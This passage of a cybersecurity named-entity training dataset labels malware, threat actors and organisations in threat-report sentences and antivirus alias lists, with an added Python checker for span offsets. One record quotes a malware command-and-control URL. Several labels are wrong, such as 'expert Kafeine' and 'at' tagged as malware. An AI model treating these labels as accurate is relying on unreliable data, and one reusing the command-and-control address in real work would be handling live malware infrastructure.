38]]}, "info": {"id": "cyner2_train_005665", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LRQwegierExe.Trojan Trojan/W32.Small.14848.CH Trojan.Daws.17020 Trojan.Kazy.D192B Win32.Trojan.Dalixi.f Trojan-Dropper.Win32.Daws.dyru Troj.W32.KillAV.lCzy BehavesLike.Win32.VTFlooder.lh Trojan:Win32/Ghodow.A Trojan-Dropper.Win32.Daws.dyru Win32/Dalixi.A Trojan.Dalixi!sYT5S6B5t8c W32/Dloader.IQS!tr.dldr Win32/Trojan.b7f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005667", "source": "cyner2_train"}} {"text": "A new ransomware called CryptoLuck has been discovered by Proofpoint security researcher and exploit kit expert Kafeine that is being distributed via the RIG-E exploit kit.", "spans": {"MALWARE: ransomware": [[6, 16]], "MALWARE: CryptoLuck": [[24, 34]], "ORGANIZATION: Proofpoint security researcher": [[58, 88]], "MALWARE: exploit kit": [[93, 104]], "MALWARE: expert Kafeine": [[105, 119]], "MALWARE: RIG-E exploit kit.": [[154, 172]]}, "info": {"id": "cyner2_train_005669", "source": "cyner2_train"}} {"text": "Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers.", "spans": {"MALWARE: Ransomware": [[0, 10]], "ORGANIZATION: high-profile network": [[72, 92]], "ORGANIZATION: consumers.": [[142, 152]]}, "info": {"id": "cyner2_train_005671", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Staget!O Trojan.Vb.AB2 Trojan.Injector Trojan/Staget.fk Trojan.Zusy.D381B TROJ_CHEKAF.SMIA Win32.Trojan.U-Staget.a TROJ_CHEKAF.SMIA Win.Trojan.Staget-28 Trojan.Win32.SelfDel.cdyc Trojan.Win32.Staget.btpvn Trojan.Win32.A.Staget.98334 Troj.W32.SelfDel.tnPD Trojan.MulDrop1.56405 Trojan.Staget.Win32.367 BehavesLike.Win32.Swisyn.nm Trojan/Staget.hg Trojan/Win32.Staget Win32.Troj.Staget.fk.kcloud Trojan.Win32.SelfDel.cdyc Trojan/Win32.Staget.R21060 Trojan.VBRA.09701 Trojan.Staget!A6l5b/HpLEg Trojan.Win32.Staget 
W32/Staget.EG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005673", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/CoinMiner.td not-a-virus:RiskTool.Win32.BitCoinMiner.wzo Riskware.Win32.BitCoinMiner.dktqwy Tool.BtcMine.479 Trojan.CoinMiner.Win32.1509 Trojan.Win32.CoinMiner RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Dimnir.A Application.Heur2.EE0329 not-a-virus:RiskTool.Win32.BitCoinMiner.wzo W32/CoinMiner.TD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005674", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Hotdog.A Backdoor.Hotdog.A Trojan.Win32.Hotdog.chmwe W32/Hotdog.B Spyware.Hotra TROJ_HOTDOG.A Backdoor.Win32.Hotdog Backdoor.Hotdog.A Backdoor.Hotdog!YGk3IGmjo+U Backdoor.Win32.Hotdog.B Backdoor.Hotdog.A Trojan.Hotdog.49152 TROJ_HOTDOG.A Win32.Hack.Hotdog.8F.kcloud Backdoor:Win32/Hotdog.A Trojan.Win32.Hotra.49152 Backdoor.Hotdog.A W32/Hotdog.OZIJ-0895 Win-Trojan/Hotra.57344 Spyware.Hotra Win32/Hotdog.B Backdoor.Win32.Hotdog W32/Hotdog.A!tr.bdr BackDoor.Hotdog.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005675", "source": "cyner2_train"}} {"text": "malware used by the HiddenCobra threat group", "spans": {"MALWARE: malware": [[0, 7]], "THREAT_ACTOR: the HiddenCobra threat group": [[16, 44]]}, "info": {"id": "cyner2_train_005676", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Dexter.A4 Trojan.Poxters.Win32.176 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_DEXTR.SMM HEUR:Trojan.Win32.Invader Trojan.Win32.Invader.elqaga Trojan.FakeAV.19781 BKDR_DEXTR.SMM BehavesLike.Win32.VTFlooder.nh Trojan.Invader.aqk Trojan/Win32.Invader HEUR:Trojan.Win32.Invader Trojan.Invader! 
Trojan.Win32.Poxters W32/Poxters.E!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005677", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.FC.316 Win32.Trojan.WisdomEyes.16070401.9500.9957 MSIL.Backdoor.Orcus.A Troj.Spy.Msil!c Trojan.DownLoader25.14345 BehavesLike.Win32.Backdoor.dc TrojanSpy.MSIL.sam TR/Dropper.MSIL.yknpx PWS:MSIL/Orcus.A!bit Win-Trojan/OrcusRAT.Exp Trj/CI.A Win32/Trojan.Spy.c29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005678", "source": "cyner2_train"}} {"text": "A year later, a more dangerous version was released.", "spans": {}, "info": {"id": "cyner2_train_005679", "source": "cyner2_train"}} {"text": "The malware spreads very fast using Telegram messenger application in smartphones, targeting high-profile Libyan influential and political figures.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: Telegram messenger application": [[36, 66]], "SYSTEM: smartphones,": [[70, 82]], "ORGANIZATION: high-profile Libyan influential": [[93, 124]], "ORGANIZATION: political figures.": [[129, 147]]}, "info": {"id": "cyner2_train_005682", "source": "cyner2_train"}} {"text": "Much of the contents of that report are reproduced here.", "spans": {}, "info": {"id": "cyner2_train_005684", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Stration PUA.Packed.MEW-1 IM-Worm.Win32.Sumom.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005687", "source": "cyner2_train"}} {"text": "In a seven-hour window, Raytheon | Websense stopped over 16,000 malicious email messages from being delivered to customers, all of which appear to have been Japanese targets.", "spans": {"ORGANIZATION: Raytheon": [[24, 32]]}, "info": {"id": "cyner2_train_005688", "source": "cyner2_train"}} {"text": "The exploit code attached used for dropping the malware is older – CVE-2012-0158 – and from our vantage point, we have no indication of successful 
or failed exploitation.", "spans": {"MALWARE: The exploit code": [[0, 16]], "MALWARE: malware": [[48, 55]], "VULNERABILITY: exploitation.": [[157, 170]]}, "info": {"id": "cyner2_train_005689", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.OptixKill.31744 Trojan/OptixKill.10 TROJ_OPTIXKILL.F Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/Trojan.HEHF-6024 TROJ_OPTIXKILL.F Win.Trojan.Killer-4 Trojan.Win32.OptixKill.10 Trojan.Win32.OptixKill.dkur Trojan.Win32.A.OptixKill.31744 TrojWare.Win32.OptixKill.10 Trojan.OptixKiller Trojan.OptixKill.Win32.20 Trojan/Win32.OptixKill.10 W32.Trojan.Backdoor-Ealim TR/OptixKill.10 Trojan/Win32.OptixKill Trojan:Win32/Optixkiller.A Troj.W32.OptixKill.10!c Trojan.Win32.OptixKill.10 Trojan/Win32.HDC.C1938 Trojan.OptixKill Trj/OptixKill.10 Win32/OptixKill.10 Win32.Trojan.Optixkill.Wsat Trojan.OptixKill!RjZYoc6lQeg Trojan-PWS.Win32.Lmir.wj W32/OptixKill.10!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005690", "source": "cyner2_train"}} {"text": "While threat actors using the PlugX Trojan typically leverage legitimate executables to load their malicious DLLs through a technique called DLL side-loading, Unit 42 has observed a new executable in use for this purpose.", "spans": {"THREAT_ACTOR: threat actors": [[6, 19]], "MALWARE: PlugX Trojan": [[30, 42]], "ORGANIZATION: Unit 42": [[159, 166]]}, "info": {"id": "cyner2_train_005691", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Conficker.lh Trojan.Win32.Spy Win32.Troj.Undef.kcloud Trojan.Kazy.D2002F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005692", "source": "cyner2_train"}} {"text": "Although Banker has been in the wild for years, this time we see it using a Dynamic Loading Library DLL with malicious exported functions.", "spans": {"THREAT_ACTOR: Banker": [[9, 15]], "MALWARE: malicious exported functions.": [[109, 138]]}, 
"info": {"id": "cyner2_train_005693", "source": "cyner2_train"}} {"text": "It was first reported in 2013 under the version number 2.0-LNK where it used the tag BaneChant in its command-and-control C2 network request.", "spans": {"MALWARE: 2.0-LNK": [[55, 62]], "MALWARE: BaneChant": [[85, 94]]}, "info": {"id": "cyner2_train_005694", "source": "cyner2_train"}} {"text": "Due to its ability to intercept SMS communications, the malware is also able to bypass SMS-based two-factor authentication.", "spans": {"MALWARE: malware": [[56, 63]]}, "info": {"id": "cyner2_train_005695", "source": "cyner2_train"}} {"text": "In 2019, X-Force IRIS incident responders observed ITG03 conducting a campaign against a financial institution in Southeast Asia targeting the institution's SWIFT environment.", "spans": {"ORGANIZATION: X-Force IRIS": [[9, 21]], "THREAT_ACTOR: ITG03": [[51, 56]], "THREAT_ACTOR: campaign": [[70, 78]], "ORGANIZATION: a financial institution": [[87, 110]], "ORGANIZATION: the institution's SWIFT environment.": [[139, 175]]}, "info": {"id": "cyner2_train_005696", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 W32/Small.WMNN-1529 TSPY_ONLING.SMIF Trojan.Win32.OnLineGames.vmk Trojan.DownLoader4.46724 TSPY_ONLING.SMIF W32/Small.IH TR/Fakealert.39719 TrojanDownloader:Win32/Rarcon.B Trojan.Graftor.D46F5 Trojan-Downloader.Win32.Small Win32/Trojan.add", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005698", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.SmForw.AE Android.Trojan.SMSSend.IA AndroidOS/Trojan.DPEF-9 Android.Trojan.SMSSend.IA A.H.Int.SmsThief.DBA Trojan.Android.SmsForward.duiqpk Android.SmsSpy.672.origin Trojan[SMS]/Android.SmForw.aa Android.Trojan.SMSSend.IA Android-Trojan/SmsSend.915f Trojan.AndroidOS.Lockerpin", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005699", "source": "cyner2_train"}} {"text": "SageCrypt downloaders, often poorly detected 
at the network level due to the usage of LetsEncrypt certificates.", "spans": {"MALWARE: SageCrypt downloaders,": [[0, 22]]}, "info": {"id": "cyner2_train_005700", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packer.Morphine.B Packer.Morphine.B Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Conhook-11 Packer.Morphine.B Packer.Morphine.B Packer.Morphine.B TrojWare.Win32.PkdMorphine.~AN Packer.Morphine.B Trojan.Click.3614 BehavesLike.Win32.Pykse.gc Trojan.Win32.BHO Packed.Morphine.a Trojan:Win32/Bohojan.A Packer.Morphine.B W32/BHO.BO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005701", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Newspy W32/NionSpy.e!dr TROJ_MEWSPY.CE Trojan.Win32.MewsSpy.drsazo TrojWare.Win32.TrojanDownloader.Geral.A Win32.MewsSpy.47 TROJ_MEWSPY.CE BehavesLike.Win32.DocumentCrypt.cc Virus.Win32.MewsSpy W32/Trojan.OBEZ-9322 Trojan.Kazy.D2524 Trojan:Win32/Newspy.A Trj/CI.A Win32.Virus.Mewsspy.Hroy W32/MewsSpy.AE Win32/Trojan.22f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005702", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.SWF.CVE-2014-8439.A Trojan.Swifi TROJ_FRS.PMA000B515 Swf.Exploit.Angler-4 Trojan.Swf.CVE20140515.dsfxmi SWF.Z.CVE-2014-0515.87352 Exploit.SWF.376 TROJ_FRS.PMA000B515 BehavesLike.Flash.Exploit.cb Exploit:SWF/Axpergle.B SWF/Exploit.ExKit.H Exploit.SWF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005703", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan:Win32/Plugx.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005705", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.Zlob.Win32.16141 Trojan.Kazy.D15115 Win32.Trojan.WisdomEyes.16070401.9500.9987 TROJ_ZLOB.HRX Win.Trojan.Zlob-2206 Trojan-Downloader.Win32.Zlob.vjl Trojan.Win32.Zlob.cvogpg TrojWare.Win32.TrojanDownloader.Zlob.~YG Trojan.Popuper.7315 
TROJ_ZLOB.HRX Trojan.Zlob TrojanDownloader.Zlob.lui TR/Dldr.Zlob.pea.1 Trojan[Downloader]/Win32.Zlob Trojan-Downloader.Win32.Zlob.vjl Trojan/Win32.Zlob.R23708 Trojan.Zlob.23616 Win32/TrojanDownloader.Zlob.CHF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005706", "source": "cyner2_train"}} {"text": "For five months, Check Point mobile threat researchers had unprecedented, behind the scenes access to a group of cybercriminals in China.", "spans": {"ORGANIZATION: Check Point mobile threat researchers": [[17, 54]], "THREAT_ACTOR: group": [[104, 109]], "THREAT_ACTOR: cybercriminals": [[113, 127]]}, "info": {"id": "cyner2_train_005708", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Zusy.D3C813 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005709", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.KolabcK.PE Net-Worm.Win32.Kolabc!O W32.Futu.A2 Win32.Virus.Probably.c W32.Blaster.Worm PE_FUTU.A Win.Exploit.DCOM-5 Win32.Trojan-Dropper.Rbot.A Virus.Win32.Kolabc.brlvjf W32.W.Kolabc.m0xC Virus.Win32.Kolabc.aab BackDoor.Swz.125 Worm.Kolabc.Win32.2973 PE_FUTU.A BehavesLike.Win32.Backdoor.wz Worm[Net]/Win32.Kolabc Worm.Kolabc.gu.kcloud Worm/Win32.Kolabc.R68544 BackDoor.Swz! 
Trojan-Proxy.Win32.Ranky W32/Kolabc.GU!worm.im Worm.Kolabc W32/BadFuture.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005711", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.4A43 Trojan.Application.LoadMoney.Razy.8 Win32.Adware.Kryptik.c Infostealer.Limitail Win.Trojan.Loadmoney-12443 not-a-virus:Downloader.Win32.Plocust.dwa Trojan.Win32.LoadMoney.cspznv TrojWare.Win32.Kryptik.BAJ Trojan.LoadMoney.15 Trojan/StartPage.pch RiskWare[Downloader]/Win32.Plocust.dwa not-a-virus:Downloader.Win32.Plocust.dwa PUP/Win32.LoadMoney.R99289 TScope.Malware-Cryptor.SB Trojan.Win32.Spy Win32/Application.a8e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005712", "source": "cyner2_train"}} {"text": "An unknown attacker gained access to the Bangladesh Bank's BB SWIFT payment system and reportedly instructed an American bank to transfer money from BB's account to accounts in The Philippines.", "spans": {"THREAT_ACTOR: unknown attacker": [[3, 19]], "ORGANIZATION: Bangladesh Bank's BB": [[41, 61]], "SYSTEM: SWIFT payment system": [[62, 82]], "ORGANIZATION: American bank": [[112, 125]]}, "info": {"id": "cyner2_train_005713", "source": "cyner2_train"}} {"text": "The Stegoloader malware family also known as Win32/Gatak.DR and TSPY_GATAK.GTK despite not sharing any similarities with the Gataka banking trojan was first identified at the end of 2013 and has attracted little public attention.", "spans": {"MALWARE: Stegoloader malware": [[4, 23]], "MALWARE: Gataka banking trojan": [[125, 146]]}, "info": {"id": "cyner2_train_005714", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D2B9C9 Trojan.Delf.Win32.71682 BehavesLike.Win32.BadFile.hh PUA.Toolbar.TB Trojan:Win32/Waqlop.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005715", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Scar!O Trojan.Scar Win.Trojan.Scar-8271 
Trojan.Win32.Scar.evwf Trojan.Win32.A.Scar.53248.I W32.W.WBNA.lJwt Trojan.Scar.Win32.68398 BehavesLike.Win32.VBObfus.lz Trojan.Win32.Scar Trojan/Scar.azur Trojan/Win32.Scar Trojan.Win32.Scar.evwf Trojan/Win32.Scar.R55318 Trojan.Scar Win32/VB.ROS Win32.Trojan.Scar.Pbfp Trojan.Scar!dNffxsGO4PU W32/Scar.EVWF!tr Win32/Trojan.b39", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005717", "source": "cyner2_train"}} {"text": "Fidelis Cybersecurity analysis has identified unrelated cyber criminal activity leveraging the vulnerability cited in CVE-2014-4114, which was initially exploited by advanced persistent threat APT actors in October 2014.", "spans": {"ORGANIZATION: Fidelis Cybersecurity analysis": [[0, 30]], "THREAT_ACTOR: cyber criminal activity": [[56, 79]], "VULNERABILITY: vulnerability": [[95, 108]], "VULNERABILITY: exploited": [[153, 162]], "THREAT_ACTOR: advanced persistent threat APT actors": [[166, 203]]}, "info": {"id": "cyner2_train_005718", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.E1FFDC Trojan.Win32.Delf.cxivds BehavesLike.Win32.Trojan.gh TR/Dldr.Slarkic.H.4 Trojan[Downloader]/Win32.Unknown TrojanDownloader:Win32/Notorgatro.B Trojan/Win32.CSon.R2885 Downloader.Delphi Trj/CI.A Win32/Trojan.BO.0a3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005719", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Protux Backdoor/Protux.wz Trojan.Win32.Protux.pdpbh Backdoor.Trojan Protux.AO Backdoor.Win32.Protux.ws Backdoor.Protux!x0RB0sLZXQU Win32.HLLW.Autoruner1.4496 BDS/Protux.ws Heuristic.BehavesLike.Win32.Backdoor.H Backdoor/Protux.ht Win32.Troj.Undef.kcloud Backdoor.Win32.A.Protux.102400.A Backdoor/Win32.Trojan Backdoor.Protux Backdoor.Trojan Backdoor.Win32.Protux W32/Protux.WS!tr.bdr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005721", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Obfuscated.FA 
Trojan.Win32.Zapchast!IK Dropper.Win32.Mnless.fxg Trojan.Win32.Zapchast", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005722", "source": "cyner2_train"}} {"text": "The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely", "spans": {"ORGANIZATION: reader": [[4, 10]], "SYSTEM: router": [[54, 60]]}, "info": {"id": "cyner2_train_005723", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Nimda.E Win32.Trojan.HotKeysHook.b W32/NetWorm.YYMQ-0484 Win32/Nimda.E Win.Worm.N-74 Win32.Trojan.HotKeysHook.A Net-Worm.Win32.Nimda.e Trojan.Win32.Nimda.glkx Win32.HLLW.Nimda.57344 Worm.Nimda.Win32.79 W32/NetWorm.BF W32/Nimda.3 Worm[Net]/Win32.Nimda.e Trojan.Strictor.D1109F Net-Worm.Win32.Nimda.e Trojan/Win32.HDC.C61626 Worm.Nimda Worm.Nimda!YOZDpQiibZo Trojan.I-Worm.Nimda Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005725", "source": "cyner2_train"}} {"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events .", "spans": {"MALWARE: XLoader": [[525, 532]]}, "info": {"id": "cyner2_train_005727", "source": "cyner2_train"}} {"text": "A backdoor also known as: Java/Jacksbot.W Backdoor.Trojan Java.Jacksbot.136 BehavesLike.Win32.Trojan.wc Java/Jacksbot.W Trojan.Java.ce Trj/CI.A Win32/Trojan.407", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005728", "source": "cyner2_train"}} 
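The records on this page are newline-delimited JSON: a "text" string, a "spans" map whose keys have the shape "LABEL: surface" and whose values are lists of character offset pairs, and an "info" block with the record id. Before training or evaluating on data in this shape, the first check is that every offset pair actually selects the surface string its key claims, and that no two spans overlap (a flat NER tagger cannot encode that). The validator below is an added example written for this page, not code from the CyNER project; it assumes half-open [start, end) offsets (which the records above bear out), copies three records from the page unchanged, and adds one constructed record, id "constructed_0001", carrying a wrong offset and an overlapping span so the failure paths are exercised. Spans whose surface ends in punctuation, such as "consumers." above, are reported as suspect rather than wrong, since that is usually a tokenisation slip worth a human look.

```python
import json
from typing import Dict, List, Tuple

# Three records copied from the page above (ids kept), plus one constructed
# record ("constructed_0001") with a wrong offset and an overlapping span so
# the failure paths are exercised. Offsets are half-open [start, end).
RECORDS_JSONL = r'''
{"text": "A backdoor also known as: Trojan:Win32/Plugx.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005705", "source": "cyner2_train"}}
{"text": "Due to its ability to intercept SMS communications, the malware is also able to bypass SMS-based two-factor authentication.", "spans": {"MALWARE: malware": [[56, 63]]}, "info": {"id": "cyner2_train_005695", "source": "cyner2_train"}}
{"text": "Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers.", "spans": {"MALWARE: Ransomware": [[0, 10]], "ORGANIZATION: high-profile network": [[72, 92]], "ORGANIZATION: consumers.": [[142, 152]]}, "info": {"id": "cyner2_train_005671", "source": "cyner2_train"}}
{"text": "Constructed sample: the malware beacons every hour.", "spans": {"MALWARE: malware": [[20, 27]], "MALWARE: the malware": [[20, 31]]}, "info": {"id": "constructed_0001", "source": "constructed"}}
'''

TRAILING_PUNCT = ".,;:"


def parse_records(jsonl: str) -> List[dict]:
    """One JSON object per non-blank line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def split_key(key: str) -> Tuple[str, str]:
    """'MALWARE: backdoor' -> ('MALWARE', 'backdoor').

    Labels never contain ': ' but surface strings may, so split once only.
    """
    label, surface = key.split(": ", 1)
    return label, surface


def check_record(rec: dict) -> Dict[str, List[str]]:
    """Validate every span of one record.

    mismatch: text[start:end] differs from the surface string in the key
              (wrong offsets, or text edited after annotation).
    suspect:  surface ends with punctuation, a tokenisation slip worth review.
    overlap:  two spans cover the same characters.
    """
    text = rec["text"]
    problems: Dict[str, List[str]] = {"mismatch": [], "suspect": [], "overlap": []}
    intervals: List[Tuple[int, int, str]] = []
    for key, offsets in rec["spans"].items():
        label, surface = split_key(key)
        for start, end in offsets:
            intervals.append((start, end, label))
            got = text[start:end]
            if got != surface:
                problems["mismatch"].append(
                    f"{label} [{start},{end}) expected {surface!r} got {got!r}")
            elif surface and surface[-1] in TRAILING_PUNCT:
                problems["suspect"].append(
                    f"{label} [{start},{end}) {surface!r} ends with punctuation")
    # Sort by start offset; any span starting before the previous one ends overlaps it.
    intervals.sort()
    for (s1, e1, l1), (s2, e2, l2) in zip(intervals, intervals[1:]):
        if s2 < e1:
            problems["overlap"].append(f"{l1} [{s1},{e1}) overlaps {l2} [{s2},{e2})")
    return problems


def check_corpus(jsonl: str) -> Dict[str, Dict[str, List[str]]]:
    """Map record id -> problems; a clean record maps to three empty lists."""
    return {rec["info"]["id"]: check_record(rec) for rec in parse_records(jsonl)}


if __name__ == "__main__":
    for rec_id, problems in check_corpus(RECORDS_JSONL).items():
        flagged = [f"{kind}: {msg}" for kind, msgs in problems.items() for msg in msgs]
        print(rec_id, "OK" if not flagged else "; ".join(flagged))
```

Run against a whole file, the report is the list to triage before the data goes anywhere near a model: mismatches mean the offsets and the text have drifted apart and the record cannot be trusted; overlaps must be resolved to one span; suspect spans are where a reviewer decides whether the trailing punctuation belongs to the entity.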
{"text": "The targeting of state and local government agencies as well as the distribution methods are very similar to a CryptFile2 campaign we described in August.", "spans": {"ORGANIZATION: state": [[17, 22]], "ORGANIZATION: local government agencies": [[27, 52]], "MALWARE: CryptFile2": [[111, 121]], "THREAT_ACTOR: campaign": [[122, 130]]}, "info": {"id": "cyner2_train_005729", "source": "cyner2_train"}} {"text": "We detected yet another 51 Trojan porn clickers accessible for the users to download.", "spans": {"MALWARE: 51 Trojan porn clickers": [[24, 47]]}, "info": {"id": "cyner2_train_005730", "source": "cyner2_train"}} {"text": "After launch , it downloads a codec for MP3 encoding directly from the C & C server : http : //54.67.109.199/skype_resource/libmp3lame.dll The skype_sync2.exe module has a compilation timestamp – Feb 06 2017 and the following PDB string : \\\\vmware-host\\Shared Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb network.exe is a module for submitting all exfiltrated data to the server .", "spans": {}, "info": {"id": "cyner2_train_005732", "source": "cyner2_train"}} {"text": "Dell SecureWorks Counter Threat Unit™ CTU researchers analyzed spam campaigns that distributed the AdWind remote access trojan RAT.", "spans": {"ORGANIZATION: Dell SecureWorks Counter Threat Unit™ CTU researchers": [[0, 53]], "THREAT_ACTOR: spam campaigns": [[63, 77]], "MALWARE: AdWind remote access trojan RAT.": [[99, 131]]}, "info": {"id": "cyner2_train_005734", "source": "cyner2_train"}} {"text": "Following a previous discovery, FireEye Labs mobile researchers discovered another malicious adware family quickly spreading worldwide that allows for complete takeover of a user's Android device.", "spans": {"ORGANIZATION: FireEye Labs mobile researchers": [[32, 63]], "MALWARE: malicious adware family": [[83, 106]], "SYSTEM: Android device.": [[181, 196]]}, "info": {"id": "cyner2_train_005735", "source": "cyner2_train"}} {"text": 
"This campaign was focused on various South American banks in an attempt to steal credentials from the user to allow for illicit financial gain for the malicious actors.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: South American banks": [[37, 57]], "THREAT_ACTOR: malicious actors.": [[151, 168]]}, "info": {"id": "cyner2_train_005736", "source": "cyner2_train"}} {"text": "Ironically, Ben-Gurion University is home to Israel's Cyber Security Research Center.", "spans": {"ORGANIZATION: Ben-Gurion University": [[12, 33]], "ORGANIZATION: Israel's Cyber Security Research Center.": [[45, 85]]}, "info": {"id": "cyner2_train_005737", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Typic!O Downldr.TonickCS.S543700 Dropper.Typic.Win32.736 Trojan/Dropper.Typic.arx Win32.Trojan-Downloader.VB.p Win32/Fruspam.GF Win.Trojan.Typic-1 Trojan-Downloader.Win32.Dapato.stb Trojan.Win32.Typic.dvexc TrojWare.Win32.TrojanDownloader.VB.OSNA TrojanDropper.Typic.me Trojan[Dropper]/Win32.Typic Dropper/Win32.Typic.R2031 TrojanDownloader.VB Trojan.Downloader.WCA Win32/TrojanDownloader.VB.OSN Trojan.DR.Typic!OCnhzJxHb3A Backdoor.Win32.Bifrose Trj/Downloader.XOR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005741", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Shylock Trojan.Win32.Inject1.dkmayz Trojan.Win32.Z.Matrix.5088483 Trojan.Inject1.30662 Trojan.Blocker.Win32.12010 Trojan.Win32.Trxa W32/Trojan.SIWU-6483 Backdoor/Androm.ayy Trojan/Win32.Unknown Trojan.Matrix.1 Trojan:Win32/Trxa.A Backdoor.Androm Trj/CI.A Msil.Trojan.Kryptik.Lnej Trojan.Kryptik!0hVPn+vQuN8 MSIL/Kryptik.OR!tr Win32/Trojan.edc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005742", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9967 Trojan.VB.Win32.113731 Backdoor.Win32.Cinasquel 
Backdoor:Win32/Cinasquel.A Backdoor/Win32.RemoteAccess.R125850", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005743", "source": "cyner2_train"}} {"text": "Comodo Threat Research Labs CTRL identified a new phishing email, that contains a malware file, and spread to email user with subject Dossier M978885982A -", "spans": {"ORGANIZATION: Comodo Threat Research Labs CTRL": [[0, 32]], "MALWARE: malware file,": [[82, 95]]}, "info": {"id": "cyner2_train_005744", "source": "cyner2_train"}} {"text": "Adobe may have already patched a Flash Player vulnerability last week, but several users—especially those in the US, Canada, and the UK —are still currently exposed and are at risk of getting infected with CryptoWall 3.0. The Magnitude Exploit Kit included an exploit, detected as SWF_EXPLOIT.MJTE, for the said vulnerability, allowing attackers to spread crypto-ransomware into their target systems.", "spans": {"ORGANIZATION: Adobe": [[0, 5]], "SYSTEM: Flash Player": [[33, 45]], "MALWARE: at": [[173, 175]], "MALWARE: CryptoWall 3.0. 
